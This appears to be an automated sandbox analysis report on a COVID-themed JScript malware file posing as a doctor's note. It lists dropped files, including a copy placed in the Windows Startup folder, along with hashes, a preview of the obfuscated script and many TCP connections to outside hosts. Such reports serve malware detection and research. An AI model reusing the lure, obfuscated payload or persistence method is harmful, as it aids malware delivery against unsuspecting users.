Preview:	//*ERROR DECODING SIGNATURE FOR PATIENT //..//ERROR OUTPUT*//....var _0x39e5=['mCozt8kWW4eQEG','CNvU','W53dQmk9cmoWC0Krl3y','mZq2odK1DNLpAwXg','u2W2ymoJWQCPW5C','DgvZDa','rxHWyw5Krw52AxjVBM1LBNrtDhjPBMDZ','mty2mZe2u0DUq1z3','mJG4odi0q0HOAfbJ','ybpdShBdI8o/mdvSWRTG','jvrftvaL','WPRcJSk5WPdcPCksmSkyW6BdJComW4u9vG','C2vUza','WRhdVmoDc8o3W5zo','y2HHCKf0','WORcKCkSWORcQSkAmSkB','F8kLW40M','vxnLCI1bz2vUDa','z3zcW5FcVCoOECkBW6xcQCk2gI3dG01L','Aw5WDxq','CxvPDa','cSkTdmoA','W7KoWRlcQvpdOmkku8k7cNObb8o6W5fGWPNcImkfW4OKgCofzG','D3nJCMLWDc5LEguGlY9cia','uMvNuMvHza','W5xcRHpcMmooWR9jWPWvts8','B3bLBG','BgvUz3rO','WO1dAhxcSW','ytL3WP/cK8oHWO12beqi','zNjVBunOyxjdB2rL','WPKBohVcU8ohW7azW7eXWO0','WR0GW7ddVSoUW7uObfhdHCoZWQn3W4/cRYHAW5VcKCkkW5SFafagWQfiFCkMA8k1W4BdNHpcLCoDrLJdVSkYWPxcGZRcPgS','tw96AwXSys81lJaGkfDPBMrVD3mGtLqGmtaUmdSGv2LUnJq7ihG2ncKGqxbWBgvxzwjlAxqVntm3lJm2icHlsfrntcWGBgLRzsbhzwnRBYKGq2HYB21LlZG4lJaUndmYnc4XntaGu2fMyxjPlZuZnY4ZnIbfzgCVodGUmc43mduUnJm','ftRdKq3dNa','W4DpyI/dTSow'

C:\Users\user\AppData\Roaming\COVID_19_Test_Result_Doctor_Note.js:Zone.Identifier Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	234
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYygPYygPYygPYygPYygPYygPYygPYygPYV:rPY9PY9PY9PY9PY9PY9PY9PY9PYV
MD5:	50E408353C45A0E43FEE2912545FD0DA
SHA1:	837B6AFE00D4F309306EF4A8A0D41DBA58E9DDE8
SHA-256:	99CF92E14C1E44D944457A5FA6D70E299A53D6F9E7139EC9075816339E0776E8
SHA-512:	8D51089351D0F24F86635C477303B21349AA04ED1F4992E78C6E9089FFF7BE4FCA3A01EEC91CDBE6B6CBCEDAA3FD83AED65788F094D0F9EEA2AFA8811C063484
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\COVID_19_Test_Result_Doctor_Note.js Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	148258
Entropy (8bit):	5.728503884778436
Encrypted:	false
SSDEEP:	3072:nDrUDrUDrUDrUDrUDrUDrUDrUDrUDrUDr8:w
MD5:	20DE972471DAADAE6CB0F5E02A8B086A
SHA1:	385ED3F4BC135BF3EDE4431DB99FED77B270C1A7
SHA-256:	48E87C1998F977933BCF1B3DB76F9BA2AE71A352C49FEBDD6A7178A275E02CFC
SHA-512:	823649B22F3269F3E6F2BEC6B06CE1BA4E6F63003EEE89401283A37548E5090160CC0E24A62FD5E34BEF1F56D7E1F0D122F2C42767B7AFDC8D5C9D55B214920F
Malicious:	true
Reputation:	low
Preview:	//*ERROR DECODING SIGNATURE FOR PATIENT //..//ERROR OUTPUT*//....var _0x39e5=['mCozt8kWW4eQEG','CNvU','W53dQmk9cmoWC0Krl3y','mZq2odK1DNLpAwXg','u2W2ymoJWQCPW5C','DgvZDa','rxHWyw5Krw52AxjVBM1LBNrtDhjPBMDZ','mty2mZe2u0DUq1z3','mJG4odi0q0HOAfbJ','ybpdShBdI8o/mdvSWRTG','jvrftvaL','WPRcJSk5WPdcPCksmSkyW6BdJComW4u9vG','C2vUza','WRhdVmoDc8o3W5zo','y2HHCKf0','WORcKCkSWORcQSkAmSkB','F8kLW40M','vxnLCI1bz2vUDa','z3zcW5FcVCoOECkBW6xcQCk2gI3dG01L','Aw5WDxq','CxvPDa','cSkTdmoA','W7KoWRlcQvpdOmkku8k7cNObb8o6W5fGWPNcImkfW4OKgCofzG','D3nJCMLWDc5LEguGlY9cia','uMvNuMvHza','W5xcRHpcMmooWR9jWPWvts8','B3bLBG','BgvUz3rO','WO1dAhxcSW','ytL3WP/cK8oHWO12beqi','zNjVBunOyxjdB2rL','WPKBohVcU8ohW7azW7eXWO0','WR0GW7ddVSoUW7uObfhdHCoZWQn3W4/cRYHAW5VcKCkkW5SFafagWQfiFCkMA8k1W4BdNHpcLCoDrLJdVSkYWPxcGZRcPgS','tw96AwXSys81lJaGkfDPBMrVD3mGtLqGmtaUmdSGv2LUnJq7ihG2ncKGqxbWBgvxzwjlAxqVntm3lJm2icHlsfrntcWGBgLRzsbhzwnRBYKGq2HYB21LlZG4lJaUndmYnc4XntaGu2fMyxjPlZuZnY4ZnIbfzgCVodGUmc43mduUnJm','ftRdKq3dNa','W4DpyI/dTSow'

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\COVID_19_Test_Result_Doctor_Note.js:Zone.Identifier Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	286
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	6:rPY9PY9PY9PY9PY9PY9PY9PY9PY9PY9PYV:0
MD5:	68BE646FDC74813E5832C59B9D8066FF
SHA1:	82911496CC363EC82BA9AB4270B54D959955165E
SHA-256:	A3EF922B6506CB0747F4F5A3B4468F0DA2A727313B49A2831B442EAF282C5ECC
SHA-512:	7B73FE4E7E5F3CBB3A39C452E39F011A9161F11D6EAD472EDA2ED19B9EB9B84AA175EF004DA8EE12DF288180388607A75129B113F9A2B9BFEA55875321ADCFE3
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	ASCII text, with very long lines, with CRLF line terminators
Entropy (8bit):	5.728503884778436
TrID:	Digital Micrograph Script (4001/1) 100.00%
File name:	COVID_19_Test_Result_Doctor_Note.js
File size:	13478
MD5:	0bca3422ec870f28791d61a4fa25367f
SHA1:	36352478af11cdd59c55b8ef8ecf2cfacb2dcaaa
SHA256:	7703889f1b2c6fd8a1fe0abc4a8b6a409d4e6eabe5943c4a5261dfc68fb973f6
SHA512:	bcaeb9faad34f88a8a7392743a8d71eb793eb865f17c3b2232ddb28066a5959e14f476dcffd26901a79e3cf1b8cee05deb96e06d9da6693b7958d1b3915d92d3
SSDEEP:	384:90DjR41HSTJwGFP4NK4lKm5+tbK4vgDDr843x7z/RjozIFY:9ajy1yT1FP4NnlKztbnMDr8uxnRjAIFY
File Content Preview:	//*ERROR DECODING SIGNATURE FOR PATIENT //..//ERROR OUTPUT*//....var _0x39e5=['mCozt8kWW4eQEG','CNvU','W53dQmk9cmoWC0Krl3y','mZq2odK1DNLpAwXg','u2W2ymoJWQCPW5C','DgvZDa','rxHWyw5Krw52AxjVBM1LBNrtDhjPBMDZ','mty2mZe2u0DUq1z3','mJG4odi0q0HOAfbJ','y

File Icon


Icon Hash:	e8d69ece968a9ec4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 9, 2021 09:20:14.913134098 CET	49716	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:14.951203108 CET	80	49716	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:14.951339960 CET	49716	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:14.951766968 CET	49716	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:14.951808929 CET	49716	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:14.989655972 CET	80	49716	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:14.989675999 CET	80	49716	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:15.295753002 CET	80	49716	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:15.295769930 CET	80	49716	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:15.295842886 CET	49716	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:18.637155056 CET	49716	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:18.676693916 CET	80	49716	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:18.676760912 CET	49716	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:18.717931986 CET	49717	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:20:18.767863035 CET	80	49717	172.67.178.142	192.168.2.5
Mar 9, 2021 09:20:18.768469095 CET	49717	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:20:18.768830061 CET	49717	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:20:18.768898964 CET	49717	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:20:18.817518950 CET	80	49717	172.67.178.142	192.168.2.5
Mar 9, 2021 09:20:18.817538023 CET	80	49717	172.67.178.142	192.168.2.5
Mar 9, 2021 09:20:19.146580935 CET	80	49717	172.67.178.142	192.168.2.5
Mar 9, 2021 09:20:19.194742918 CET	49717	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:20:26.529778957 CET	49717	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:20:26.579034090 CET	80	49717	172.67.178.142	192.168.2.5
Mar 9, 2021 09:20:26.579133987 CET	49717	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:20:26.609252930 CET	49719	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:26.647521973 CET	80	49719	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:26.648816109 CET	49719	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:26.649158001 CET	49719	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:26.649223089 CET	49719	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:26.689764023 CET	80	49719	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:26.689789057 CET	80	49719	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:26.991022110 CET	80	49719	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:27.195492029 CET	49719	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:27.232168913 CET	80	49719	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:27.232320070 CET	49719	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:32.320106030 CET	49723	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:32.358335972 CET	80	49723	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:32.358470917 CET	49723	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:32.358911037 CET	49723	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:32.358958960 CET	49723	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:32.397507906 CET	80	49723	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:32.397526979 CET	80	49723	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:32.604892969 CET	49719	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:32.645298004 CET	80	49719	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:32.645375967 CET	49719	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:32.677541018 CET	49724	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:32.690907001 CET	80	49723	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:32.717022896 CET	80	49724	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:32.717125893 CET	49724	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:32.718812943 CET	49724	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:32.718858957 CET	49724	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:32.758109093 CET	80	49724	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:32.758141041 CET	80	49724	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:32.883536100 CET	49723	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:33.066905022 CET	80	49724	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:33.196441889 CET	49724	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:37.413014889 CET	49723	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:37.452397108 CET	80	49723	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:37.452505112 CET	49723	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:37.481183052 CET	49728	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:37.519494057 CET	80	49728	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:37.519622087 CET	49728	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:37.520031929 CET	49728	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:37.520055056 CET	49728	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:37.557949066 CET	80	49728	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:37.557951927 CET	80	49728	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:37.875382900 CET	80	49728	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:38.008404016 CET	49728	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:38.987215042 CET	49724	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:39.026962996 CET	80	49724	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:39.027098894 CET	49724	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:39.066169024 CET	49729	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:39.104387045 CET	80	49729	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:39.104484081 CET	49729	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:39.104857922 CET	49729	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:39.104926109 CET	49729	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:39.142839909 CET	80	49729	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:39.142853022 CET	80	49729	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:39.445570946 CET	80	49729	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:39.515849113 CET	49729	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:40.670851946 CET	49730	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:40.709124088 CET	80	49730	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:40.710201979 CET	49730	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:40.710464001 CET	49730	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:40.710514069 CET	49730	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:40.748536110 CET	80	49730	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:40.748567104 CET	80	49730	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:41.073745966 CET	80	49730	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:41.243645906 CET	49730	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:45.601372957 CET	49728	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:45.639493942 CET	80	49728	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:45.639564037 CET	49728	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:45.685373068 CET	49732	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:45.725200891 CET	80	49732	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:45.725409985 CET	49732	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:45.727435112 CET	49732	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:45.727569103 CET	49732	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:45.765415907 CET	80	49732	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:45.765436888 CET	80	49732	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:46.061866999 CET	80	49732	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:46.150182962 CET	49732	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:47.883778095 CET	49729	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:47.922099113 CET	80	49729	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:47.922441006 CET	49729	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:47.960046053 CET	49733	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:47.997986078 CET	80	49733	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:47.998243093 CET	49733	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:47.999089003 CET	49733	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:47.999135017 CET	49733	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:48.036993027 CET	80	49733	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:48.037009954 CET	80	49733	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:48.327545881 CET	80	49733	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:48.480967045 CET	49733	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:49.285243034 CET	49730	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:49.324430943 CET	80	49730	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:49.324907064 CET	49730	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:49.392296076 CET	49734	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:49.430480003 CET	80	49734	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:49.430602074 CET	49734	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:49.431641102 CET	49734	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:49.432156086 CET	49734	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:49.471103907 CET	80	49734	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:49.471535921 CET	80	49734	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:49.783247948 CET	80	49734	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:49.853669882 CET	49734	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:53.652266026 CET	49732	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:53.690977097 CET	80	49732	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:53.691158056 CET	49732	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:53.721081018 CET	49735	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:53.759800911 CET	80	49735	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:53.759926081 CET	49735	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:53.764487028 CET	49735	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:53.764552116 CET	49735	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:53.802575111 CET	80	49735	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:53.802623987 CET	80	49735	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:54.101183891 CET	80	49735	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:54.243338108 CET	49735	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:54.549083948 CET	49736	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:20:54.597368956 CET	80	49736	172.67.178.142	192.168.2.5
Mar 9, 2021 09:20:54.597526073 CET	49736	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:20:54.598642111 CET	49736	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:20:54.598696947 CET	49736	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:20:54.646852970 CET	80	49736	172.67.178.142	192.168.2.5
Mar 9, 2021 09:20:54.646898031 CET	80	49736	172.67.178.142	192.168.2.5
Mar 9, 2021 09:20:54.956355095 CET	80	49736	172.67.178.142	192.168.2.5
Mar 9, 2021 09:20:55.197959900 CET	49736	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:20:55.207986116 CET	80	49736	172.67.178.142	192.168.2.5
Mar 9, 2021 09:20:55.208076000 CET	49736	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:20:55.448004007 CET	49733	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:55.486306906 CET	80	49733	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:55.486433983 CET	49733	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:55.529243946 CET	49737	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:55.567572117 CET	80	49737	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:55.569619894 CET	49737	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:55.570003033 CET	49737	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:55.570039988 CET	49737	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:20:55.608170033 CET	80	49737	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:55.608202934 CET	80	49737	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:55.909006119 CET	80	49737	104.21.48.50	192.168.2.5
Mar 9, 2021 09:20:56.057440996 CET	49737	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:00.533111095 CET	49734	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:00.571412086 CET	80	49734	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:00.571552992 CET	49734	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:00.690896988 CET	49739	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:00.728897095 CET	80	49739	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:00.729042053 CET	49739	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:00.729496002 CET	49739	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:00.729552984 CET	49739	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:00.767344952 CET	80	49739	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:00.767364979 CET	80	49739	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:01.085912943 CET	80	49739	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:01.130321980 CET	49739	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:02.651850939 CET	49735	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:02.690340042 CET	80	49735	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:02.690504074 CET	49735	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:02.726897955 CET	49740	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:02.765072107 CET	80	49740	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:02.765362024 CET	49740	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:02.765944004 CET	49740	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:02.765969038 CET	49740	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:02.803879023 CET	80	49740	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:02.803925991 CET	80	49740	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:03.102153063 CET	80	49740	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:03.151695967 CET	49740	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:03.959157944 CET	49736	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:04.007800102 CET	80	49736	172.67.178.142	192.168.2.5
Mar 9, 2021 09:21:04.007874966 CET	49736	80	192.168.2.5	172.67.178.142
Mar 9, 2021 09:21:04.062474012 CET	49741	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:04.100616932 CET	80	49741	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:04.100903034 CET	49741	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:04.101386070 CET	49741	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:04.101474047 CET	49741	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:04.139455080 CET	80	49741	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:04.139497995 CET	80	49741	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:04.446127892 CET	80	49741	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:04.549817085 CET	49741	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:04.666835070 CET	49737	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:04.705188036 CET	80	49737	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:04.708141088 CET	49737	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:04.748028994 CET	49742	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:04.786091089 CET	80	49742	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:04.786566019 CET	49742	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:04.786616087 CET	49742	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:04.786643028 CET	49742	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:04.824615002 CET	80	49742	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:04.824644089 CET	80	49742	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:05.136694908 CET	80	49742	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:05.241447926 CET	49742	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:08.714854956 CET	49739	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:08.753015995 CET	80	49739	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:08.756628990 CET	49739	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:08.825905085 CET	49743	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:08.863920927 CET	80	49743	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:08.864618063 CET	49743	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:08.865406036 CET	49743	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:08.865483046 CET	49743	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:08.903238058 CET	80	49743	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:08.903254986 CET	80	49743	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:09.235137939 CET	80	49743	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:09.355305910 CET	49743	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:10.088053942 CET	49740	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:10.128674030 CET	80	49740	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:10.129040956 CET	49740	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:10.197830915 CET	49744	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:10.236110926 CET	80	49744	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:10.236299038 CET	49744	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:10.236613989 CET	49744	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:10.238893032 CET	49744	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:10.274741888 CET	80	49744	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:10.276989937 CET	80	49744	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:10.601907015 CET	80	49744	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:10.699183941 CET	49744	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:12.678950071 CET	49742	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:12.720053911 CET	80	49742	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:12.720501900 CET	49742	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:12.763907909 CET	49745	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:12.801976919 CET	80	49745	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:12.802625895 CET	49745	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:12.802946091 CET	49745	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:12.802999020 CET	49745	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:12.840955019 CET	80	49745	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:12.841006041 CET	80	49745	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:13.158740997 CET	80	49745	104.21.48.50	192.168.2.5
Mar 9, 2021 09:21:13.199372053 CET	49745	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:13.909518003 CET	49741	80	192.168.2.5	104.21.48.50
Mar 9, 2021 09:21:13.947881937 CET	80	49741	104.21.48.50	192.168.2.5
